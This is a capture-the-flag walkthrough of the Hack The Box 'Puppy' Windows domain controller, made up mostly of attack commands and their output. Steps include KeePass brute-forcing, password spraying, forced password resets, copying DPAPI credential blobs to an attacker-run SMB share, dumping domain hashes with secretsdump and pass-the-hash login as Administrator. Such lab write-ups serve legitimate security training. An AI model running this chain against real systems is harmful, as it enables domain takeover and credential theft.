๐ถPuppy
https://app.hackthebox.com/machines/Puppy
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Recon
User
Root
Last updated
https://app.hackthebox.com/machines/Puppy
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Last updated
[*] Running initial Nmap scan..
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 10:15 CEST
Nmap scan report for puppy.htb
Host is up (0.018s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 15:15:11Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windowsโ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --users
[..]
SMB <machineip> 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB <machineip> 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB <machineip> 445 DC [+] Enumerated domain user(s)
SMB <machineip> 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB <machineip> 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB <machineip> 445 DC PUPPY.HTB\levi.james badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB <machineip> 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB <machineip> 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
โ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
โ cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateResolvConf = false
nameserver <machineip>
nameserver 10.255.255.254
search localdomain
โ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 04S
โ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --shares
SMB 10.129.253.192 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.253.192 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.253.192 445 DC [+] Enumerated shares
SMB 10.129.253.192 445 DC Share Permissions Remark
SMB 10.129.253.192 445 DC ----- ----------- ------
SMB 10.129.253.192 445 DC ADMIN$ Remote Admin
SMB 10.129.253.192 445 DC C$ Default share
SMB 10.129.253.192 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.129.253.192 445 DC IPC$ READ Remote IPC
SMB 10.129.253.192 445 DC NETLOGON READ Logon server share
SMB 10.129.253.192 445 DC SYSVOL READ Logon server share
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTBldapmodify -x -H ldap://<ip> -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f modify.ldifsmbclient //10.10.11.70/dev -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 08:07:57 2025
.. D 0 Sat Mar 8 17:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 08:09:12 2025
Projects D 0 Sat Mar 8 17:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 03:25:46 2025
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (31.5 KiloBytes/sec) (average 31.5 KiloBytes/sec)
โ puppy sudo apt-get install keepassxc
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
[..]
โ git clone https://github.com/r3nt0n/keepass4brute
Cloning into 'keepass4brute'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 10), reused 9 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 18.26 KiB | 2.28 MiB/s, done.
Resolving deltas: 100% (10/10), done.
โ ./keepass4brute/keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 36/14344392 - Attempts per minute: 144 - Estimated time remaining: 9 weeks, 6 days
[+] Current attempt: liverpool
[*] Password found: liverpoolโ cat user.txt
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
โ cat passes
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!โ crackmapexec smb <ip> -u user.txt -p passes
[..]
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
โ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_edwards.json -ns <ip>โ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' <ip>
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987โ nxc smb <ip> -u 'ADAM.SILVER' -p 'Password@987'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ADAM.SILVER:Password@987 STATUS_ACCOUNT_DISABLED โ bloodyAD --host dc.puppy.htb -d puppy.htb -u ant.edwards -p Antman2025! remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from ADAM.SILVER's userAccountControl
โ evil-winrm -i <ip> -u adam.silver -p Password@987
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/9/2025 10:48 AM Backups
d----- 5/12/2025 5:21 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 4/4/2025 3:40 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d----- 3/8/2025 9:00 AM StorageReports
d-r--- 3/8/2025 8:52 AM Users
d----- 5/13/2025 4:40 PM Windows
*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> dir
Directory: C:\Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip
Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>nms-auth-config.xml.bakโ evil-winrm -i 10.10.11.70 -u steph.cooper -p ChefSteph2025!
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> โ mkdir -p share
โ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy "C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "\\<ip>\share\masterkey_blob"
*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> dir -h
Directory: C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> copy C8D69EBE9A43E9DEBF6B5FBD48B521B9 "\\<ip>\share\credential_blob"
โ python3 /usr/share/doc/python3-impacket/examples/dpapi.py masterkey -f masterkey_blob -password ChefSteph2025! -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
โ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!โ impacket-secretsdump PUPPY.HTB/steph.cooper_adm:'FivethChipOnItsWay2025!'@puppy.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
####[Below is the Admin hash we need]#######
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8::
[...]โ evil-winrm -i puppy.htb -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/24/2025 5:15 PM 34 root.txt